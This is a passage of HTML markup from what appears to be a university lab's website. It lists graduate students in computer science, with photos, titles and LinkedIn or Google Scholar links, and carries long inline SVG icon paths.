26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c67\" id=\"grads\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-846 style-local-182-c67 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c140\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-860 style-local-182-c140 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-861-outer style-local-182-c141-outer\">\n            <div data-colibri-id=\"182-c141\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-861 style-local-182-c141 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c142\" class=\"h-global-transition-all h-heading style-862 style-local-182-c142 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-862 style-local-182-c142\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Graduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c68\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-847 style-local-182-c68 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c69-outer\">\n            <div data-colibri-id=\"182-c69\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c69 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c70\" class=\"d-block style-854 style-local-182-c70 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-282038166_2492815234187345_4129762528023780269_n-e1697142834100.jpg\" class=\"wp-image-1659 style-854-image style-local-182-c70-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c70-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c71\" class=\"h-global-transition-all h-heading style-850 style-local-182-c71 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c71\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sundos Al Subhi</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c72\" class=\"h-text h-text-component style-851 style-local-182-c72 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c73\" class=\"h-text h-text-component style-902 style-local-182-c73 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c74\" class=\"style-855 style-local-182-c74 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sundos-al-subhi-88bb97150\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c75-outer\">\n            <div data-colibri-id=\"182-c75\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c75 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c76\" class=\"d-block style-849 style-local-182-c76 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-IMG_1240-scaled-1.jpg\" class=\"wp-image-1336 style-849-image style-local-182-c76-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-849-frameImage style-local-182-c76-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c77\" class=\"h-global-transition-all h-heading style-850 style-local-182-c77 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c77\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Aaja Christie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c78\" class=\"h-text h-text-component style-851 style-local-182-c78 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c79\" class=\"h-text h-text-component style-901 style-local-182-c79 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c80\" class=\"style-853 style-local-182-c80 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/aaja-christie-17573657/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c81-outer\">\n            <div data-colibri-id=\"182-c81\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c81 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c82\" class=\"d-block style-856 style-local-182-c82 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Emma.jpg\" class=\"wp-image-966 style-856-image style-local-182-c82-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-856-frameImage style-local-182-c82-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c83\" class=\"h-global-transition-all h-heading style-850 style-local-182-c83 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c83\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Emma McDaniel</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c84\" class=\"h-text h-text-component style-851 style-local-182-c84 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c85\" class=\"h-text h-text-component style-852 style-local-182-c85 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c86\" class=\"style-857 style-local-182-c86 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/emmamcdaniel/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=Cwt8OwkAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c87-outer\">\n            <div data-colibri-id=\"182-c87\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c87 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c88\" class=\"d-block style-854 style-local-182-c88 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/anupam.jpg\" class=\"wp-image-1624 style-854-image style-local-182-c88-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c88-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c89\" class=\"h-global-transition-all h-heading style-850 style-local-182-c89 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c89\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anupam Sarker</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c90\" class=\"h-text h-text-component style-851 style-local-182-c90 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c91\" class=\"h-text h-text-component style-902 style-local-182-c91 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c92\" class=\"style-855 style-local-182-c92 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anupam-sarker-b164b412a\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 